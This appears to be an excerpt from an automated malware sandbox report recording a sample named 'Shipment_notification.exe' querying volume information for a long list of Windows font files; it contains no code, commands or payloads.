          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
